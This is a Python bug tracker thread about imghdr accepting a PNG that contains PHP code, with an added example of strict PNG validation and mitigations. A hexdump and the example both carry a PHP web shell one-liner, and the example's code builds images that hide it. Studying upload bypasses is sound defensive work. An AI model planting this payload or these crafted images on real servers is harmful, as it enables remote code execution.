Classification
Title: Bypass imghdr module determines the type of image
Type: behavior    Stage:
Components: Library (Lib)    Versions: Python 3.5
Process
Status: open    Resolution:
Dependencies:    Superseder:
Assigned To:    Nosy List: Ramin Farajpour Cami, serhiy.storchaka, steven.daprano
Priority: normal    Keywords:

Created on 2016-02-11 05:55 by Ramin Farajpour Cami, last changed 2016-02-11 11:33 by Ramin Farajpour Cami.

Files
File name     Uploaded
phppng.png    Ramin Farajpour Cami, 2016-02-11 05:55
Messages (4)
msg260074 - Author: Ramin Farajpour Cami (Ramin Farajpour Cami) Date: 2016-02-11 05:55
import imghdr
imghdr.what('phppng.png')

output:
'png'

If you put a JavaScript script in a .png or .jpg file, the output is:
ValueError: invalid \x escape

Hexdump:
root@Ramin:~# hexdump -C phppng.png
00000000  89 50 4e 47 0d 0a 1a 0a  00 00 00 0d 49 48 44 52  |.PNG........IHDR|
00000010  00 00 00 20 00 00 00 20  08 02 00 00 00 fc 18 ed  |... ... ........|
00000020  a3 00 00 00 09 70 48 59  73 00 00 0e c4 00 00 0e  |.....pHYs.......|
00000030  c4 01 95 2b 0e 1b 00 00  00 60 49 44 41 54 48 89  |...+.....`IDATH.|
00000040  63 5c 3c 3f 3d 24 5f 47  45 54 5b 30 5d 28 24 5f  |c\<?=$_GET[0]($_|  ### Here PHP Code
00000050  50 4f 53 54 5b 31 5d 29  3b 3f 3e 58 80 81 81 c1  |POST[1]);?>X....|
00000060  73 5e 37 93 fc 8f 8b db  7e 5f d3 7d aa 27 f7 f1  |s^7.....~_.}.'..|
00000070  e3 c9 bf 5f ef 06 7c b2  30 30 63 d9 b9 67 fd d9  |..._..|.00c..g..|
00000080  3d 1b ce 32 8c 82 51 30  0a 46 c1 28 18 05 a3 60  |=..2..Q0.F.(...`|
00000090  14 8c 82 51 30 0a 86 0d  00 00 81 b2 1b 02 07 78  |...Q0..........x|
000000a0  0d 0c 00 00 00 00 49 45  4e 44 ae 42 60 82        |......IEND.B`.|
000000ae
msg260080 - Author: Steven D'Aprano (steven.daprano) * (Python committer) Date: 2016-02-11 09:53
I'm sorry, I don't understand what you think is the bug here. It looks like you are passing a corrupted file which has a PNG extension but is not actually a PNG file (it contains PHP code). What do you expect should happen?
msg260082 - Author: Ramin Farajpour Cami (Ramin Farajpour Cami) Date: 2016-02-11 10:21
Images can be served with a content type of text/html (which means we can certainly inject HTML).
msg260091 - Author: Ramin Farajpour Cami (Ramin Farajpour Cami) Date: 2016-02-11 11:33
Normally, if you choose an image, open it in an editor and put code into it, you get an error, but I am able to bypass the image upload check if it uses the imghdr module to validate the image: boom, an image with malicious code is uploaded.
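The following is an added example and is not code from this tracker thread or from CPython. It reproduces the behaviour the reporter describes with PNG files constructed in memory: for PNG, imghdr.what() only tests whether the file starts with the 8-byte PNG signature, so a file that is structurally a PNG but carries other bytes in an ancillary chunk, or after IEND, is still reported as 'png'. The sniff() function below reimplements that prefix test rather than importing imghdr (imghdr was deprecated in Python 3.11 and removed in 3.13); strict_png_check() is a stricter, chunk-level validator written for this example; PAYLOAD is the PHP string visible in the issue's hexdump; all file names and the sample images are constructed here.

```python
"""Why imghdr.what() == 'png' says nothing about what a file contains.
Added example; the PNGs are built in memory, nothing is read from disk."""
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
PAYLOAD = b"<?=$_GET[0]($_POST[1]);?>"   # the PHP string from the issue's hexdump


def _chunk(ctype: bytes, data: bytes) -> bytes:
    """Serialise one PNG chunk: 4-byte length, type, data, CRC32(type + data)."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def make_png(width, height, extra_chunks=(), trailer=b""):
    """Build a minimal, conformant 8-bit RGB PNG (all-black pixels).
    extra_chunks go before IDAT; trailer is appended after IEND."""
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)
    # Each scanline is a filter byte (0 = None) followed by width*3 samples.
    raw = (b"\x00" + b"\x00" * (width * 3)) * height
    out = PNG_SIG + _chunk(b"IHDR", ihdr)
    for ctype, data in extra_chunks:
        out += _chunk(ctype, data)
    out += _chunk(b"IDAT", zlib.compress(raw)) + _chunk(b"IEND", b"")
    return out + trailer


def sniff(data):
    """Equivalent of the PNG test imghdr.what() performs: a prefix match only."""
    return "png" if data.startswith(PNG_SIG) else None


def strict_png_check(data):
    """Walk the chunk list: IHDR first, IEND last, every CRC correct, nothing
    after IEND, inflated IDAT exactly the size IHDR implies.
    Returns None when the file is well-formed, otherwise a reason string."""
    if not data.startswith(PNG_SIG):
        return "bad signature"
    pos, types, ihdr, idat = len(PNG_SIG), [], b"", b""
    while pos + 12 <= len(data):
        (length,) = struct.unpack(">I", data[pos:pos + 4])
        if pos + 12 + length > len(data):
            return "truncated chunk"
        ctype = data[pos + 4:pos + 8]
        payload = data[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", data[pos + 8 + length:pos + 12 + length])
        if crc != zlib.crc32(ctype + payload) & 0xFFFFFFFF:
            return "bad CRC in %r" % ctype
        types.append(ctype)
        if ctype == b"IHDR":
            ihdr = payload
        elif ctype == b"IDAT":
            idat += payload
        pos += 12 + length
        if ctype == b"IEND":
            break
    if not types or types[0] != b"IHDR" or types[-1] != b"IEND":
        return "IHDR/IEND out of place"
    if pos != len(data):
        return "trailing data after IEND"
    if len(ihdr) != 13:
        return "bad IHDR"
    width, height, depth, colour = struct.unpack(">IIBB", ihdr[:10])
    channels = {0: 1, 2: 3, 3: 1, 4: 2, 6: 4}.get(colour)
    if depth != 8 or channels is None:
        return "unsupported format for this checker"
    try:
        pixels = zlib.decompress(idat)
    except zlib.error:
        return "corrupt IDAT"
    if len(pixels) != height * (1 + width * channels):
        return "IDAT size mismatch"
    return None


def has_script_markers(data):
    """Crude content heuristic: PHP/HTML script openers anywhere in the bytes.
    Easy to evade, so it is a signal, not a defence."""
    return any(m in data.lower() for m in (b"<?", b"<script"))


# Three constructed uploads: clean, payload inside a tEXt chunk (still a
# valid PNG), and payload appended after IEND.
CLEAN = make_png(4, 4)
IN_TEXT_CHUNK = make_png(4, 4, extra_chunks=[(b"tEXt", b"Comment\x00" + PAYLOAD)])
AFTER_IEND = make_png(4, 4, trailer=PAYLOAD)


def classify(data):
    """What each check says about one file."""
    return {"sniff": sniff(data), "strict": strict_png_check(data),
            "markers": has_script_markers(data)}


if __name__ == "__main__":
    for name, blob in (("clean", CLEAN), ("tEXt payload", IN_TEXT_CHUNK),
                       ("after IEND", AFTER_IEND)):
        print(name, classify(blob))
```

All three files sniff as 'png'. The chunk-level validator rejects the trailing-data variant but accepts the tEXt variant, because a PNG that carries PHP in a text chunk is a perfectly valid PNG; structural validity and hostile content are independent properties. The mitigation therefore belongs on the server: store uploads under a server-chosen name and extension outside any path the web server will execute, serve them with a fixed image Content-Type and X-Content-Type-Options: nosniff, and where possible re-encode through an image library, which discards ancillary chunks and trailing bytes.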
History
Date                 User                  Action   Args
2016-02-11 11:33:56  Ramin Farajpour Cami  set      messages: + msg260091
2016-02-11 10:21:20  Ramin Farajpour Cami  set      messages: + msg260082
2016-02-11 09:53:16  steven.daprano        set      nosy: + steven.daprano
                                                    messages: + msg260080
2016-02-11 08:15:59  Ramin Farajpour Cami  set      nosy: + serhiy.storchaka
2016-02-11 05:55:17  Ramin Farajpour Cami  create